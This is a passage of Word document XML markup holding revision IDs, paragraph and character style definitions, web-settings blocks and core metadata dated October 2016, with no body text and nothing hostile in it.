    <w:rsid w:val="005019E2"/>
    <w:rsid w:val="00517AF7"/>
    <w:rsid w:val="00526B8A"/>
    <w:rsid w:val="005276D8"/>
    <w:rsid w:val="00536425"/>
    <w:rsid w:val="00543E07"/>
    <w:rsid w:val="005444C3"/>
    <w:rsid w:val="005525A0"/>
    <w:rsid w:val="00552D58"/>
    <w:rsid w:val="005B27AA"/>
    <w:rsid w:val="005F684C"/>
    <w:rsid w:val="006218D9"/>
    <w:rsid w:val="00622089"/>
    <w:rsid w:val="00637242"/>
    <w:rsid w:val="006429B8"/>
    <w:rsid w:val="00653817"/>
    <w:rsid w:val="00656FD7"/>
    <w:rsid w:val="00672A26"/>
    <w:rsid w:val="006822DF"/>
    <w:rsid w:val="00691583"/>
    <w:rsid w:val="00694394"/>
    <w:rsid w:val="00696E3E"/>
    <w:rsid w:val="006C2E86"/>
    <w:rsid w:val="006D4A11"/>
    <w:rsid w:val="006E1CD4"/>
    <w:rsid w:val="006E2EEB"/>
    <w:rsid w:val="0071564E"/>
    <w:rsid w:val="00735804"/>
    <w:rsid w:val="00743983"/>
    <w:rsid w:val="0074483B"/>
    <w:rsid w:val="007914A1"/>
    <w:rsid w:val="007C737B"/>
    <w:rsid w:val="007F02D6"/>
    <w:rsid w:val="007F6BB5"/>
    <w:rsid w:val="007F6D8A"/>
    <w:rsid w:val="0082508E"/>
    <w:rsid w:val="00884241"/>
    <w:rsid w:val="008861B0"/>
    <w:rsid w:val="00886321"/>
    <w:rsid w:val="008A2EC5"/>
    <w:rsid w:val="008C4AD3"/>
    <w:rsid w:val="008D1E3E"/>
    <w:rsid w:val="008D744B"/>
    <w:rsid w:val="008D7CC9"/>
    <w:rsid w:val="008E0868"/>
    <w:rsid w:val="008E6D16"/>
    <w:rsid w:val="008E70DC"/>
    <w:rsid w:val="008F7152"/>
    <w:rsid w:val="008F797C"/>
    <w:rsid w:val="0092211A"/>
    <w:rsid w:val="009251DB"/>
    <w:rsid w:val="009419B6"/>
    <w:rsid w:val="00945FF5"/>
    <w:rsid w:val="00947E09"/>
    <w:rsid w:val="00962E4A"/>
    <w:rsid w:val="00965127"/>
    <w:rsid w:val="00983D6F"/>
    <w:rsid w:val="00990B77"/>
    <w:rsid w:val="00997F87"/>
    <w:rsid w:val="009A23E2"/>
    <w:rsid w:val="009A6E98"/>
    <w:rsid w:val="009B0208"/>
    <w:rsid w:val="009E0DA3"/>
    <w:rsid w:val="009E0F4D"/>
    <w:rsid w:val="00A400DA"/>
    <w:rsid w:val="00A40A2D"/>
    <w:rsid w:val="00A60DC1"/>
    <w:rsid w:val="00AA61E3"/>
    <w:rsid w:val="00AB0FC4"/>
    <w:rsid w:val="00AC77EE"/>
    <w:rsid w:val="00AD209D"/>
    <w:rsid w:val="00AD385E"/>
    <w:rsid w:val="00AE4C4C"/>
    <w:rsid w:val="00B01BED"/>
    <w:rsid w:val="00B32DD5"/>
    <w:rsid w:val="00B44953"/>
    <w:rsid w:val="00B511B6"/>
    <w:rsid w:val="00B7260F"/>
    <w:rsid w:val="00B8210D"/>
    <w:rsid w:val="00B86E42"/>
    <w:rsid w:val="00B86FCF"/>
    <w:rsid w:val="00BC5C0B"/>
    <w:rsid w:val="00BD1772"/>
    <w:rsid w:val="00BD1CC4"/>
    <w:rsid w:val="00BD442A"/>
    <w:rsid w:val="00C004CC"/>
    <w:rsid w:val="00C060B9"/>
    <w:rsid w:val="00C10CC0"/>
    <w:rsid w:val="00C15829"/>
    <w:rsid w:val="00C200D8"/>
    <w:rsid w:val="00C376F2"/>
    <w:rsid w:val="00C41F51"/>
    <w:rsid w:val="00C510F9"/>
    <w:rsid w:val="00C51AB4"/>
    <w:rsid w:val="00C65561"/>
    <w:rsid w:val="00C65969"/>
    <w:rsid w:val="00C73078"/>
    <w:rsid w:val="00C81125"/>
    <w:rsid w:val="00CA2B36"/>
    <w:rsid w:val="00CA4184"/>
    <w:rsid w:val="00CA6024"/>
    <w:rsid w:val="00CA7F8D"/>
    <w:rsid w:val="00CB31DA"/>
    <w:rsid w:val="00CD1840"/>
    <w:rsid w:val="00CD44C9"/>
    <w:rsid w:val="00CF520B"/>
    <w:rsid w:val="00D25DD4"/>
    <w:rsid w:val="00D352A1"/>
    <w:rsid w:val="00D473A9"/>
    <w:rsid w:val="00D50D65"/>
    <w:rsid w:val="00D64193"/>
    <w:rsid w:val="00D66054"/>
    <w:rsid w:val="00D72FF9"/>
    <w:rsid w:val="00D82F46"/>
    <w:rsid w:val="00D83674"/>
    <w:rsid w:val="00D91543"/>
    <w:rsid w:val="00D9304D"/>
    <w:rsid w:val="00DB1131"/>
    <w:rsid w:val="00DB1D31"/>
    <w:rsid w:val="00DC05E9"/>
    <w:rsid w:val="00DD25D5"/>
    <w:rsid w:val="00DF2655"/>
    <w:rsid w:val="00DF4366"/>
    <w:rsid w:val="00DF6A77"/>
    <w:rsid w:val="00E03E70"/>
    <w:rsid w:val="00E4017B"/>
    <w:rsid w:val="00E476FC"/>
    <w:rsid w:val="00EA1422"/>
    <w:rsid w:val="00EB5B0F"/>
    <w:rsid w:val="00F1071E"/>
    <w:rsid w:val="00F14BA5"/>
    <w:rsid w:val="00F256E3"/>
    <w:rsid w:val="00F4582F"/>
    <w:rsid w:val="00F53BBA"/>
    <w:rsid w:val="00F666D0"/>
    <w:rsid w:val="00FB11A0"/>
    <w:rsid w:val="00FC1AE3"/>
    <w:rsid w:val="00FC3E6A"/>
    <w:rsid w:val="00FC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E8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4184"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:kinsoku w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:spacing w:val="-1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="008E086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B5F"/>
    <w:pPr>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00F256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uiPriority w:val="99"/>
    <w:pPr>
      <w:kinsoku/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:ind w:left="1080"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="9"/>
      <w:szCs w:val="9"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style3">
    <w:name w:val="Style 3"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:kinsoku/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:before="72" w:line="264" w:lineRule="exact"/>
      <w:ind w:left="432"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style4">
    <w:name w:val="Style 4"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:kinsoku/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
      <w:sz w:val="11"/>
      <w:szCs w:val="1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5">
    <w:name w:val="Style 5"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:kinsoku/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:before="72"/>
      <w:ind w:left="3168"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
      <w:sz w:val="23"/>
      <w:szCs w:val="23"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style2">
    <w:name w:val="Style 2"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:kinsoku/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:before="108" w:line="201" w:lineRule="auto"/>
      <w:ind w:left="936"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
      <w:sz w:val="23"/>
      <w:szCs w:val="23"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Style6">
    <w:name w:val="Style 6"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:kinsoku/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:before="72" w:line="223" w:lineRule="auto"/>
      <w:ind w:left="1152" w:hanging="288"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
      <w:sz w:val="23"/>
      <w:szCs w:val="23"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CharacterStyle4">
    <w:name w:val="Character Style 4"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
      <w:sz w:val="11"/>
      <w:szCs w:val="11"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CharacterStyle3">
    <w:name w:val="Character Style 3"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CharacterStyle1">
    <w:name w:val="Character Style 1"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
      <w:sz w:val="23"/>
      <w:szCs w:val="23"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CharacterStyle5">
    <w:name w:val="Character Style 5"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="9"/>
      <w:szCs w:val="9"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CharacterStyle2">
    <w:name w:val="Character Style 2"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009A6E98"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="006D4A11"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="21"/>
      </w:numPr>
      <w:ind w:left="1800"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00C1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829"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00C15829"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C15829"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00C15829"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00082B5F"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:b/>
      <w:bCs/>
      <w:spacing w:val="-1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000B2650"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
    <w:name w:val="Balloon Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BalloonText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="000B2650"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00074E1F"/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00074E1F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1" w:themeFill="accent1" w:themeFillTint="33"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0003746C"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="008E086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402C7"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:kinsoku w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:spacing w:val="-1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00F256E3"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>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496">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="751657541">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="775519271">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1058817460">
          <w:marLeft w:val="547"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="115"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1647708749">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1767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DBCA-ED70-DE49-B95D-77D9303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73</Words>
  <Characters>1866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men</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-10-22T10:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-10-22T10:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>